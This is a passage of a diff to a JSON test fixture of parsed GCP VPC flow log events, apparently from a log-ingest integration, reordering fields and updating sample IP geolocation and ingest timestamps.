"{\"insertId\":\"bnj3cofh3cdk1\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34178},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:51.355687385Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:51.237256499Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:46:51.237256499Z", + "end": "2019-06-14T03:46:51.355687385Z", + "id": "bnj3cofh3cdk1", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -5335,17 +5614,22 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", + "67.43.156.14", "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -5366,21 +5650,6 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391445500Z", - "original": "{\"insertId\":\"bnj3cofh3cdk1\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34178},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:51.355687385Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:51.237256499Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:46:51.237256499Z", - "end": "2019-06-14T03:46:51.355687385Z", - "id": "bnj3cofh3cdk1", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -5389,11 +5658,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 33602, @@ -5401,6 +5675,16 @@ "ip": "67.43.156.14", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415199764Z", + "original": "{\"insertId\":\"bnj3cofh3cdjx\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":33602},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:51.090104692Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:50.954948790Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:45:50.954948790Z", + "end": "2019-06-14T03:45:51.090104692Z", + "id": "bnj3cofh3cdjx", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -5412,46 +5696,6 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, - "@timestamp": "2019-06-14T03:50:13.921Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "67.43.156.14", - "10.87.40.76" - ] - }, - "gcp": { - "destination": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391450100Z", - "original": "{\"insertId\":\"bnj3cofh3cdjx\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":33602},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:51.090104692Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:50.954948790Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:45:50.954948790Z", - "end": "2019-06-14T03:45:51.090104692Z", - "id": "bnj3cofh3cdjx", - "category": "network", - "type": "connection" } }, { @@ -5466,11 +5710,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33554, @@ -5542,7 +5791,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391454100Z", + "ingested": "2021-12-14T14:43:27.415200263Z", "original": "{\"insertId\":\"bnj3cofh3cdju\",\"jsonPayload\":{\"bytes_sent\":\"66736\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33554},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565131125Z\",\"packets_sent\":\"366\",\"reporter\":\"DEST\",\"rtt_msec\":\"224\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.143837873Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:02.143837873Z", @@ -5553,41 +5802,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.14", - "port": 33602, - "ip": "67.43.156.14" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1776, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Gt7dopsBY+UOS/rgstf7QtnWxMI=", - "bytes": 1776, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" @@ -5598,6 +5812,9 @@ "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -5618,8 +5835,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 33602, + "ip": "67.43.156.14" + }, + "source": { + "address": "10.87.40.76", + "port": 5601, + "bytes": 1776, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, "event": { - "ingested": "2021-12-09T13:37:46.391458200Z", + "ingested": "2021-12-14T14:43:27.415200718Z", "original": "{\"insertId\":\"bnj3cofh3cdjz\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":33602,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:51.090104692Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:50.954948790Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:45:50.954948790Z", @@ -5627,44 +5869,21 @@ "id": "bnj3cofh3cdjz", "category": "network", "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 52454, - "bytes": 1464, - "ip": "67.43.156.13", - "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:WoYlUsEVcZcFfg615Q+r2a53t50=", - "bytes": 1464, + "community_id": "1:Gt7dopsBY+UOS/rgstf7QtnWxMI=", + "bytes": 1776, "transport": "tcp", "type": "ipv4", "iana_number": "6", "packets": 7, - "direction": "inbound" - }, + "direction": "outbound" + } + }, + { "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" @@ -5675,6 +5894,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -5695,8 +5917,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 52454, + "bytes": 1464, + "ip": "67.43.156.13", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.391462100Z", + "ingested": "2021-12-14T14:43:27.415201160Z", "original": "{\"insertId\":\"bnj3cofh3cdkk\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":52454},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:40.888804332Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:40.779893091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:42:40.779893091Z", @@ -5704,6 +5951,18 @@ "id": "bnj3cofh3cdkk", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:WoYlUsEVcZcFfg615Q+r2a53t50=", + "bytes": 1464, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -5718,11 +5977,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -5794,7 +6058,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391465500Z", + "ingested": "2021-12-14T14:43:27.415201599Z", "original": "{\"insertId\":\"bnj3cofh3cdk0\",\"jsonPayload\":{\"bytes_sent\":\"259510\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33534,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597279654Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075756033Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075756033Z", @@ -5805,57 +6069,25 @@ } }, { + "@timestamp": "2019-06-14T03:50:13.921Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.87.40.76", + "67.43.156.13" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 52260, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1781, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:jQQ6l4o1MZQiUFoVCT++dIYahM8=", - "bytes": 1781, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:13.921Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.87.40.76", - "67.43.156.13" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } }, "source": { "vpc": { @@ -5870,8 +6102,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 52260, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.87.40.76", + "port": 5601, + "bytes": 1781, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, "event": { - "ingested": "2021-12-09T13:37:46.391469700Z", + "ingested": "2021-12-14T14:43:27.415202431Z", "original": "{\"insertId\":\"bnj3cofh3cdk8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":52260,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:11.183868408Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:11.063146265Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:42:11.063146265Z", @@ -5879,6 +6136,18 @@ "id": "bnj3cofh3cdk8", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:jQQ6l4o1MZQiUFoVCT++dIYahM8=", + "bytes": 1781, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "outbound" } }, { @@ -5887,11 +6156,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -5969,7 +6243,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391475200Z", + "ingested": "2021-12-14T14:43:27.415202930Z", "original": "{\"insertId\":\"bnj3cofh3cdkp\",\"jsonPayload\":{\"bytes_sent\":\"65069\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33530},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565300944Z\",\"packets_sent\":\"361\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140119099Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140119099Z", @@ -5985,11 +6259,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -6067,7 +6346,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391480800Z", + "ingested": "2021-12-14T14:43:27.415203358Z", "original": "{\"insertId\":\"bnj3cofh3cdkc\",\"jsonPayload\":{\"bytes_sent\":\"60530\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33556},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"366\",\"reporter\":\"SRC\",\"rtt_msec\":\"15\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", @@ -6089,11 +6368,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33570, @@ -6165,7 +6449,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391486700Z", + "ingested": "2021-12-14T14:43:27.415206690Z", "original": "{\"insertId\":\"bnj3cofh3cdkm\",\"jsonPayload\":{\"bytes_sent\":\"11384\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33570},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821047175Z\",\"packets_sent\":\"86\",\"reporter\":\"DEST\",\"rtt_msec\":\"230\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469473010Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.469473010Z", @@ -6181,11 +6465,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33554, @@ -6263,7 +6552,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391492100Z", + "ingested": "2021-12-14T14:43:27.415207171Z", "original": "{\"insertId\":\"bnj3cofh3cdjy\",\"jsonPayload\":{\"bytes_sent\":\"272063\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33554,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565131125Z\",\"packets_sent\":\"247\",\"reporter\":\"SRC\",\"rtt_msec\":\"224\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.143837873Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:02.143837873Z", @@ -6274,41 +6563,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 53706, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1791, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:FnUL58e/2lopFxzyH6NB4ZfRZYg=", - "bytes": 1791, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:13.921Z", 